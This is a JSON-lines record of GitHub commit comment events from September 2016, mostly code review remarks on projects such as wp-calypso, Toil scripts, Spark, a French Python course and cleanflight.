{"id":"4619598831","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177352,"position":6,"line":6,"path":"client/state/states-list/schema.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:32:21Z","updated_at":"2016-09-26T18:32:21Z","body":"I think this may be invalid JSON schema. The `type` seems fine, but if you're trying to validate members as having a particular object structure, you probably need to nest that within an `items` property: https://spacetelescope.github.io/understanding-json-schema/reference/array.html#items"}},"created_at":"2016-09-26T18:32:21Z"}
{"id":"4619604342","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177366,"position":5,"line":5,"path":"client/state/states-list/schema.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:33:20Z","updated_at":"2016-09-26T18:33:20Z","body":"Could we be a little more strict here? Maybe `[a-z]{2}` ? Else, as is, we probably don't need `additionalProperties: false` since all keys are matched."}},"created_at":"2016-09-26T18:33:20Z"}
{"id":"4619611175","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177379,"position":2,"line":2,"path":"client/state/states-list/selectors.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:34:37Z","updated_at":"2016-09-26T18:34:37Z","body":"`state.sitesList` is the combined reducer of `statesList` and `isFetching`. You'll need to access the items themselves via `state.statesList.stateList` . Also consider we often use `items` conventionally to contain the entities of a particular subtree (e.g. `state.statesList.items`)."}},"created_at":"2016-09-26T18:34:37Z"}
{"id":"4619612827","type":"CommitCommentEvent","actor":{"login":"locria"},"repo":{"name":"locria/COMP-1536-Assignment-1"},"payload":{"comment":{"id":19177386,"position":null,"line":null,"path":null,"commit_id":"6dad89127bdbf5a66cb6d03dcfae786bec2525b9","created_at":"2016-09-26T18:34:56Z","updated_at":"2016-09-26T18:34:56Z","body":"An empty readme.txt was also added"}},"created_at":"2016-09-26T18:34:56Z"}
{"id":"4619613242","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19177389,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T18:35:01Z","updated_at":"2016-09-26T18:35:01Z","body":"it doesn't show the splash. apparently ps sees index.html right away,\nso the loop is not excuted either... i guess i leave it as is,\nbasichtmlviewer looks for dillo, surfer, then executes\ndefaulthtmlviewer, and defaulthtmlviewer is usually the\ndefaultbrowser..\n"}},"created_at":"2016-09-26T18:35:01Z"}
{"id":"4619614404","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19177391,"position":null,"line":null,"path":null,"commit_id":"8a2edcb66395f803080d764476d1da965036d325","created_at":"2016-09-26T18:35:12Z","updated_at":"2016-09-26T18:35:12Z","body":"I see this test fail intermittently."}},"created_at":"2016-09-26T18:35:12Z"}
{"id":"4619617431","type":"CommitCommentEvent","actor":{"login":"mikadev"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19177399,"position":null,"line":null,"path":null,"commit_id":"39e599170532f64fd433dd68aa79bc0dcbda4689","created_at":"2016-09-26T18:35:44Z","updated_at":"2016-09-26T18:35:44Z","body":"thanks guys nice reactivity"}},"created_at":"2016-09-26T18:35:44Z"}
{"id":"4619619074","type":"CommitCommentEvent","actor":{"login":"justinfx"},"repo":{"name":"wkschwartz/pigosat"},"payload":{"comment":{"id":19177404,"position":null,"line":null,"path":null,"commit_id":"56429f7a4bbaffacc7939d72a011196866229828","created_at":"2016-09-26T18:36:03Z","updated_at":"2016-09-26T18:36:03Z","body":"I actually didn't write this to use the goroutine for performance reasons. If I recall correctly, it was to prevent a case I was hitting where the write to the pipe was blocking because no one was reading on the other end. The goroutine starts a read right away and drains the pipe. I'm remembering writing and testing this code and seeing no output until I did this. Can you confirm you tested this change and saw output? "}},"created_at":"2016-09-26T18:36:03Z"}
{"id":"4619622048","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19177417,"position":20,"line":27,"path":"correction-septembre-2016/youba-medjkoune/teapot_gui.py","commit_id":"153572d092a7d83f78101a495cdca8c77f0bdfb8","created_at":"2016-09-26T18:36:35Z","updated_at":"2016-09-26T18:36:35Z","body":"Attention de bien nommer les variable en minuscule et avec des underscores"}},"created_at":"2016-09-26T18:36:35Z"}
{"id":"4619625760","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19177434,"position":60,"line":64,"path":"correction-septembre-2016/youba-medjkoune/teapot_gui.py","commit_id":"153572d092a7d83f78101a495cdca8c77f0bdfb8","created_at":"2016-09-26T18:37:15Z","updated_at":"2016-09-26T18:37:15Z","body":"Il existe une méthode `.value()` à la `QSpinBox` qui permet de recupérer un `int` directement"}},"created_at":"2016-09-26T18:37:15Z"}
{"id":"4619629872","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177450,"position":571,"line":571,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:37:57Z","updated_at":"2016-09-26T18:37:57Z","body":"How is this work_dir thing supposed to work at all if this is a Toil job? Toil might send it off to some node that doesn't have this directory or this file."}},"created_at":"2016-09-26T18:37:57Z"}
{"id":"4619629999","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19177451,"position":null,"line":null,"path":null,"commit_id":"b29604235bbc78a243fbabcdf30d073a64bf1262","created_at":"2016-09-26T18:37:58Z","updated_at":"2016-09-26T18:37:58Z","body":"1973-AddDualDuctTerminals (cai799174) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-20.31%25-red.svg)</a> \n"}},"created_at":"2016-09-26T18:37:58Z"}
{"id":"4619631334","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177461,"position":26,"line":26,"path":"client/state/states-list/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:38:12Z","updated_at":"2016-09-26T18:38:12Z","body":"It's a bit of a unique case, but the endpoint doesn't seem to be case-sensitive, so we can request both `us` and `US` and they'd be tracked independently (since object keys _are_ case sensitive). With that in mind, should we force the country code to upper or lower case to prevent this from happening?"}},"created_at":"2016-09-26T18:38:12Z"}
{"id":"4619632668","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19177467,"position":20,"line":27,"path":"correction-septembre-2016/youba-medjkoune/teapot_gui.py","commit_id":"153572d092a7d83f78101a495cdca8c77f0bdfb8","created_at":"2016-09-26T18:38:26Z","updated_at":"2016-09-26T18:38:26Z","body":"Aussi, tu défini deux fois de suite la meme variable : \r\n\r\n```python\r\nself.nombreEdit = QtGui.QLineEdit()  # Cette ligne est inutile et un peu confusante\r\nself.nombreEdit = QtGui.QSpinBox()\r\n```"}},"created_at":"2016-09-26T18:38:26Z"}
{"id":"4619635373","type":"CommitCommentEvent","actor":{"login":"lukecav"},"repo":{"name":"cobicarmel/elementor"},"payload":{"comment":{"id":19177471,"position":null,"line":null,"path":null,"commit_id":"ebf38e0370b4d39beb0bf5881adcbeed7a5abb6b","created_at":"2016-09-26T18:38:54Z","updated_at":"2016-09-26T18:38:54Z","body":"There has been a few minor Ninja Forms 3.0 updates as well, since the current version is 3.0.5."}},"created_at":"2016-09-26T18:38:54Z"}
{"id":"4619635851","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19177475,"position":78,"line":73,"path":"correction-septembre-2016/youba-medjkoune/teapot_gui.py","commit_id":"153572d092a7d83f78101a495cdca8c77f0bdfb8","created_at":"2016-09-26T18:39:01Z","updated_at":"2016-09-26T18:39:01Z","body":"Il faut toujours terminer un fichier .py par une ligne vide (PEP8)"}},"created_at":"2016-09-26T18:39:01Z"}
{"id":"4619637355","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19177490,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T18:39:17Z","updated_at":"2016-09-26T18:39:17Z","body":"a possible solution is to avoid sending the viewer app to background,\nthen the dialog gets locked until the viewer is finished, so there's\nno way the user might the click the icon again out of impatience (i\ndid once, there were 5 firefox windows)..\n"}},"created_at":"2016-09-26T18:39:17Z"}
{"id":"4619638731","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177493,"position":562,"line":562,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:39:31Z","updated_at":"2016-09-26T18:39:31Z","body":"Since this function is a Toil job (right?) and since it may be scheduled on some arbitrary machine, the work_dir passed in by the job that created this job might not actually exist on the node this job is running on. Why are you listing it out here?"}},"created_at":"2016-09-26T18:39:31Z"}
{"id":"4619638926","type":"CommitCommentEvent","actor":{"login":"koeninger"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19177494,"position":157,"line":261,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"e1671525d142b249749fcd58d5d3bc325fc46c71","created_at":"2016-09-26T18:39:32Z","updated_at":"2016-09-26T18:39:32Z","body":"I've already explained my position on why starting newly discovered\npartitions from the earliest is a bad idea.  My suggestion would be that if\nyou aren't going to let people use auto.offset.reset with its normal\nsemantics, that you not let them configure it at all.\n\nFailing that, name it app.start.offset.reset or something that conveys that\nyou're only respecting it on initial application startup.\n\nOn Mon, Sep 26, 2016 at 1:26 PM, Tathagata Das <notifications@github.com>\nwrote:\n\n> Suggestions welcome! The intention is to separate from the\n> auto.offset.reset because we are changing the default semantics a little\n> bit by starting from newly discovered partitions from the earliest.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apache/spark/commit/e1671525d142b249749fcd58d5d3bc325fc46c71#commitcomment-19177185>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAGABywmuDhvxIuFkbVSrnyy2J6Ubk6Tks5quA5YgaJpZM4KG0vm>\n> .\n>\n"}},"created_at":"2016-09-26T18:39:32Z"}
{"id":"4619642703","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19177513,"position":11,"line":11,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-26T18:40:12Z","updated_at":"2016-09-26T18:40:12Z","body":"It looks like these values can only be positive, so we might as well use an unsigned typed array here.\r\n\r\nAlso, it looks like `solution` will only ever be 0-3, so we should be using a smaller type there: e.g. `Int8Array`. We can add an optional third argument where we pass this in.\r\n\r\nIt might also be worth adjusting the type of the array for `memo` based on dimensions. For most cases we probably only need 16 bits and for some very simple cases we might only need 8 bits."}},"created_at":"2016-09-26T18:40:12Z"}
{"id":"4619643731","type":"CommitCommentEvent","actor":{"login":"ikarus23"},"repo":{"name":"Proxmark/proxmark3"},"payload":{"comment":{"id":19177517,"position":null,"line":null,"path":null,"commit_id":"fd4f21b766a715303f0b1436c9970f5965e644dc","created_at":"2016-09-26T18:40:22Z","updated_at":"2016-09-26T18:40:22Z","body":"Done."}},"created_at":"2016-09-26T18:40:22Z"}
{"id":"4619645270","type":"CommitCommentEvent","actor":{"login":"dpr5ks"},"repo":{"name":"dpr5ks/cs3240-labdemo"},"payload":{"comment":{"id":19177521,"position":1,"line":1,"path":"README.md","commit_id":"9593656b1d3a0e7575f550027859221f4069db0b","created_at":"2016-09-26T18:40:38Z","updated_at":"2016-09-26T18:40:38Z","body":"my comment in lab5"}},"created_at":"2016-09-26T18:40:38Z"}
{"id":"4619645958","type":"CommitCommentEvent","actor":{"login":"marinastoycheva"},"repo":{"name":"marinastoycheva/ExercisesGitHub"},"payload":{"comment":{"id":19177523,"position":null,"line":null,"path":null,"commit_id":"151725e7179147873087f9052ec2da1aa2cc2540","created_at":"2016-09-26T18:40:45Z","updated_at":"2016-09-26T18:40:45Z","body":"first commit"}},"created_at":"2016-09-26T18:40:45Z"}
{"id":"4619646216","type":"CommitCommentEvent","actor":{"login":"lindbergan"},"repo":{"name":"drualsk/RefugeeMap"},"payload":{"comment":{"id":19177524,"position":17,"line":89,"path":"app/src/main/java/dat255/refugeemap/GMapFragment.java","commit_id":"c4d24284cfffc8a84629cf910835ee3c91183168","created_at":"2016-09-26T18:40:48Z","updated_at":"2016-09-26T18:40:48Z","body":"Shitaintworkinson"}},"created_at":"2016-09-26T18:40:48Z"}
{"id":"4619646481","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177527,"position":24,"line":24,"path":"client/state/states-list/test/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:40:50Z","updated_at":"2016-09-26T18:40:50Z","body":"I'd suggest some test helpers to avoid the need to specify these lifecycle methods:\r\n\r\n__[`useNock`](https://github.com/Automattic/wp-calypso/tree/master/test/test/helpers/use-nock)__\r\n\r\n```js\r\ndescribe( 'requestStatesList()', () => {\r\n\tuseNock( ( nock ) => {\r\n\t\tnock( 'https://public-api.wordpress.com:443' )\r\n\t\t// ...\r\n```\r\n\r\n__[`useSandbox`](https://github.com/Automattic/wp-calypso/tree/master/test/test/helpers/use-sinon)__\r\n\r\n```js\r\nlet spy;\r\nuseSandbox( ( sandbox ) => spy = sandbox.spy() );\r\n```"}},"created_at":"2016-09-26T18:40:50Z"}
{"id":"4619647049","type":"CommitCommentEvent","actor":{"login":"janetkuo"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19177528,"position":15,"line":261,"path":"pkg/api/validation/validation.go","commit_id":"b1e7e6cf463bfdb7d5dcf0724dcae614761fee82","created_at":"2016-09-26T18:40:56Z","updated_at":"2016-09-26T18:40:56Z","body":"The comment `DNS 952 label` should be updated "}},"created_at":"2016-09-26T18:40:56Z"}
{"id":"4619647599","type":"CommitCommentEvent","actor":{"login":"jessepeterson"},"repo":{"name":"autopkg/jessepeterson-recipes"},"payload":{"comment":{"id":19177530,"position":null,"line":null,"path":null,"commit_id":"9ba13556e9192fd21a950799dae3fb75e016fe68","created_at":"2016-09-26T18:41:03Z","updated_at":"2016-09-26T18:41:03Z","body":"Oops. \"Corrupt\" in the commit message should be \"Correct.\""}},"created_at":"2016-09-26T18:41:03Z"}
{"id":"4619649250","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177536,"position":773,"line":773,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:41:21Z","updated_at":"2016-09-26T18:41:21Z","body":"I don't think any of this stats code is necessary here; we only needed the stats code for the low coverage 1kg alignments for the bake-off."}},"created_at":"2016-09-26T18:41:21Z"}
{"id":"4619651090","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177543,"position":54,"line":54,"path":"client/state/states-list/test/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:41:42Z","updated_at":"2016-09-26T18:41:42Z","body":"`twice` will make it cumbersome to add or remove tests in the future. You might consider varying the response for the 500 by the country code, and using `persist` here instead."}},"created_at":"2016-09-26T18:41:42Z"}
{"id":"4619651375","type":"CommitCommentEvent","actor":{"login":"seancribbs"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19177545,"position":null,"line":null,"path":null,"commit_id":"93ca080bb9b5a1e094885fb81fea6ee04f9260f1","created_at":"2016-09-26T18:41:45Z","updated_at":"2016-09-26T18:41:45Z","body":"💯 "}},"created_at":"2016-09-26T18:41:45Z"}
{"id":"4619654955","type":"CommitCommentEvent","actor":{"login":"Pacopente"},"repo":{"name":"hirunatan/estelcon_web"},"payload":{"comment":{"id":19177554,"position":5,"line":5,"path":"src/webapp/plain_pages/templates/webapp/plain_pages/asistentes.html","commit_id":"f3fcb81587f80252a25b24dba83e05f2df4ee50b","created_at":"2016-09-26T18:42:22Z","updated_at":"2016-09-26T18:42:22Z","body":"<title>XXI Mereth Aderthad Khazad-dûm: Asistentes</title>"}},"created_at":"2016-09-26T18:42:22Z"}
{"id":"4619656169","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177555,"position":926,"line":926,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:42:35Z","updated_at":"2016-09-26T18:42:35Z","body":"Also, this mismatches counting method ignores deletions."}},"created_at":"2016-09-26T18:42:35Z"}
{"id":"4619656288","type":"CommitCommentEvent","actor":{"login":"ashah8055"},"repo":{"name":"ashah8055/CS5220-Fall2016"},"payload":{"comment":{"id":19177556,"position":null,"line":null,"path":null,"commit_id":"9b5697384ab18fd27427495ed4f80991c1aaaf53","created_at":"2016-09-26T18:42:36Z","updated_at":"2016-09-26T18:42:36Z","body":"ContactView.jsp updated"}},"created_at":"2016-09-26T18:42:36Z"}
{"id":"4619658044","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177560,"position":37,"line":37,"path":"client/state/states-list/test/reducer.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:42:56Z","updated_at":"2016-09-26T18:42:56Z","body":"`useSandbox` would work well here too:\r\n\r\n```js\r\nuseSandbox( ( sandbox ) => sandbox.stub( console, 'warn' ) );\r\n```"}},"created_at":"2016-09-26T18:42:56Z"}
{"id":"4619661889","type":"CommitCommentEvent","actor":{"login":"iameli"},"repo":{"name":"iameli/shopping-list-node"},"payload":{"comment":{"id":19177574,"position":48,"line":48,"path":"server.js","commit_id":"9a0dbee35aa730574824503af204d38280335ec3","created_at":"2016-09-26T18:43:36Z","updated_at":"2016-09-26T18:43:36Z","body":"So at this point, 75% of the code in this function is different for the `PUT` and `DELETE` code paths. I think that rather than have two `switch` statements, you should move that logic back out to the `app.delete` and `app.post` calls later down in the file.\r\n\r\nYou still want the code that validates `request.params.id` to be DRY, though, so move it out to a middleware function. [This StackOverflow answer](http://stackoverflow.com/a/18875893/990590) gives a similar example, except you'll be doing `response.status(400).send()` instead of `response.redirect(\"/auth\")`."}},"created_at":"2016-09-26T18:43:36Z"}
{"id":"4619663081","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"dhexonian/dsp"},"payload":{"comment":{"id":19177576,"position":null,"line":null,"path":null,"commit_id":"779d0eff75a933577087d5c84ab9916b9757f957","created_at":"2016-09-26T18:43:49Z","updated_at":"2016-09-26T18:43:49Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath \r\n\r\nHello @dhexonian \r\n\r\nNice work on the Python problems. Here are some comments:\r\n\r\n- In Q4, your filter example, `filter(lambda x:x%2==0,[x*2 for x in range(11)])`, is valid but extremely trivial ;-)\r\n- In Q6, `not_bad` is not working as expected. For example, `not_bad(\"This is not bad acting.\")` yields `\"This is good\"`, instead of `\"This is good acting.\"`.\r\n- In Q7, `remove_adjacent` is not working, and complains about \"NameError: global name 'xs' is not defined\".\r\n- In Q7, `linear_merge`: the basic idea of the algorithm is correct, but `pop(0)` is O(N), so not very efficient time wise. A better way is to append the desired list element to the `result` array without popping, and keep track of your position in each list with a couple of indices.\r\n- In Q8, the correct answer is Aston_Villa, as we wanted the team with the smallest *absolute value* of the difference between goals and goals allowed.\r\n\r\nWell done! 👍 \r\n\r\nLuc"}},"created_at":"2016-09-26T18:43:49Z"}
{"id":"4619668451","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"ashwinr64/android_device_oneplus_onyx"},"payload":{"comment":{"id":19177594,"position":null,"line":null,"path":null,"commit_id":"096eed57c4b911a8209d7ec8faa61d9880daa3bd","created_at":"2016-09-26T18:44:46Z","updated_at":"2016-09-26T18:44:46Z","body":"Is this for the mediaserver stuff to get camera working or is it this flag? : TARGET_NEEDS_TEXT_RELOCATIONS := true"}},"created_at":"2016-09-26T18:44:46Z"}
{"id":"4619668634","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":19177595,"position":3,"line":3,"path":"10/css/style.css","commit_id":"29b6969e900a290fac0457f456d70d76888aae96","created_at":"2016-09-26T18:44:48Z","updated_at":"2016-09-26T18:44:48Z","body":"хм... \r\nнужно было добавить \r\n```\r\ndiv {\r\n    position: relative;\r\n    overflow: hidden;\r\n}\r\n```"}},"created_at":"2016-09-26T18:44:48Z"}
{"id":"4619669632","type":"CommitCommentEvent","actor":{"login":"iameli"},"repo":{"name":"iameli/shopping-list-node"},"payload":{"comment":{"id":19177599,"position":61,"line":61,"path":"server.js","commit_id":"9a0dbee35aa730574824503af204d38280335ec3","created_at":"2016-09-26T18:44:59Z","updated_at":"2016-09-26T18:44:59Z","body":"Conventionally, a successful delete call would return a [`204 No Content`](https://httpstatuses.com/204) status, rather than a `200`."}},"created_at":"2016-09-26T18:44:59Z"}
{"id":"4619670214","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19177601,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-26T18:45:05Z","updated_at":"2016-09-26T18:45:05Z","body":"[02:33:53 AM]  Scene: Victory\r\n[02:33:55 AM]  Scene: Adventure Loot\r\n[02:34:01 AM]  Scene: Adventure Start\r\n[02:34:02 AM]  Scene: Map Select\r\n[02:34:05 AM]  Scene: Adventure Ready\r\n[02:34:05 AM]  Scene: Adventure Start\r\n[02:34:08 AM]  Scene: Adventure Fight\r\n[02:34:10 AM]  @ Wave 1\r\n[02:34:27 AM]  @ Wave 2\r\n[02:34:39 AM]  @ Wave 3\r\n[02:35:24 AM]  Scene: Victory\r\n[02:35:26 AM]  Scene: Adventure Loot\r\n[02:35:26 AM]  Limit reached [Adventure]\r\n[02:35:26 AM]  Changing objective to: Gold Chamber\r\n[02:35:28 AM]  Scene: Raid Dragon\r\n[02:37:23 AM]  IdleCounter = 1600\r\n[02:37:23 AM]  Scene: ...\r\n[02:37:23 AM]  Escape\r\n[02:37:24 AM]  Scene: Raid Dragon\r\n"}},"created_at":"2016-09-26T18:45:05Z"}
{"id":"4619670237","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19177600,"position":1,"line":1,"path":"client/state/states-list/test/reducer.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-26T18:45:05Z","updated_at":"2016-09-26T18:45:05Z","body":"Some linting warnings in this file:\r\n\r\n```text\r\nwp-calypso ((HEAD detached at 2cedce8)) $ ./node_modules/.bin/eslint client/state/states-list/test/reducer.js \r\n\r\n/Users/andrew/Documents/Code/wp-calypso/client/state/states-list/test/reducer.js\r\n  24:10  warning  Strings must use singlequote              quotes\r\n  24:22  warning  Strings must use singlequote              quotes\r\n  25:10  warning  Strings must use singlequote              quotes\r\n  25:22  warning  Strings must use singlequote              quotes\r\n  26:10  warning  Strings must use singlequote              quotes\r\n  26:22  warning  Strings must use singlequote              quotes\r\n  27:10  warning  Strings must use singlequote              quotes\r\n  27:22  warning  Strings must use singlequote              quotes\r\n  28:10  warning  Strings must use singlequote              quotes\r\n  28:22  warning  Strings must use singlequote              quotes\r\n  29:10  warning  Strings must use singlequote              quotes\r\n  29:22  warning  Strings must use singlequote              quotes\r\n  30:10  warning  Strings must use singlequote              quotes\r\n  30:22  warning  Strings must use singlequote              quotes\r\n  31:10  warning  Strings must use singlequote              quotes\r\n  31:22  warning  Strings must use singlequote              quotes\r\n  32:10  warning  Strings must use singlequote              quotes\r\n  32:22  warning  Strings must use singlequote              quotes\r\n  33:10  warning  Strings must use singlequote              quotes\r\n  33:22  warning  Strings must use singlequote              quotes\r\n  42:3   warning  Unexpected console statement              no-console\r\n  66:19  warning  [\"US\"] is better written in dot notation  dot-notation\r\n\r\n✖ 22 problems (0 errors, 22 warnings)\r\n```\r\n\r\nI'd suggest installing an ESLint plugin for your editor if one is available to make these issues more apparent.\r\n\r\nSee also: https://github.com/Automattic/wp-calypso/blob/master/docs/coding-guidelines/javascript.md#eslint"}},"created_at":"2016-09-26T18:45:05Z"}
{"id":"4619672042","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19177605,"position":7,"line":28,"path":"src/main/io/motors.h","commit_id":"4da91f62d58d35cea29ca65119217b38c85ae667","created_at":"2016-09-26T18:45:23Z","updated_at":"2016-09-26T18:45:23Z","body":"PG upgrade mechanism will discard data that won't fit, but it can cause problems if we add field in future and someone upgrades from motor_and_servo version ... reserving the space is probably safer (and all reserved fields can be dropped on next version bump)"}},"created_at":"2016-09-26T18:45:23Z"}
{"id":"4619674287","type":"CommitCommentEvent","actor":{"login":"FND"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19177612,"position":35,"line":144,"path":"wsgi_intercept/__init__.py","commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-26T18:45:47Z","updated_at":"2016-09-26T18:45:47Z","body":"Requiring users to monkey-patch the module seems like a bad API.\r\n\r\nI'm assuming this kind of global state is necessary to avoid changing existing APIs (I mego'd out tracing the potential call stacks), so some kind of initialization parameter is not an option? (Even though this is essentially a new feature, so backwards compatibility should be easy.) Perhaps an environment variable would be more suitable? (As you know, I generally dislike environment variables, but that seems the lesser evil here by far.)"}},"created_at":"2016-09-26T18:45:47Z"}
{"id":"4619676496","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19177614,"position":null,"line":null,"path":null,"commit_id":"04d82d81278c564080cc116655e7ad415f90f637","created_at":"2016-09-26T18:46:10Z","updated_at":"2016-09-26T18:46:10Z","body":"Ah yes matter. Short night, I'm exhausted.\r\n```\r\nWhat is this 0.0625?\r\n```\r\nFrom the code:\r\n```\r\n// On GS lod is an int with 4 decimal digit.\r\n```\r\nSo on the GS, number have N bit for integer part, and only 4 bit for fractional. (note my comment sucks). So you can have 0, 0.625 etc... So 0.4995 must be rounded to 1 not 0."}},"created_at":"2016-09-26T18:46:10Z"}
{"id":"4619677844","type":"CommitCommentEvent","actor":{"login":"qurben"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19177619,"position":null,"line":null,"path":null,"commit_id":"c5e240df55a592f78f54410765af1a5722d5c19d","created_at":"2016-09-26T18:46:23Z","updated_at":"2016-09-26T18:46:23Z","body":"Ja, weet jij wat hier zou moeten staan?"}},"created_at":"2016-09-26T18:46:23Z"}
{"id":"4619678001","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19177622,"position":4,"line":47,"path":"src/main/io/motors.c","commit_id":"4da91f62d58d35cea29ca65119217b38c85ae667","created_at":"2016-09-26T18:46:25Z","updated_at":"2016-09-26T18:46:25Z","body":"Unset fields are set to zero ... for reserved values it may be enough "}},"created_at":"2016-09-26T18:46:25Z"}
{"id":"4619678289","type":"CommitCommentEvent","actor":{"login":"romansimakov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19177624,"position":9,"line":190,"path":"src/burp/restore.epp","commit_id":"eb645f3b944cd65864e69e9b3af278572995b9a7","created_at":"2016-09-26T18:46:28Z","updated_at":"2016-09-26T18:46:28Z","body":"Yes. It would be."}},"created_at":"2016-09-26T18:46:28Z"}
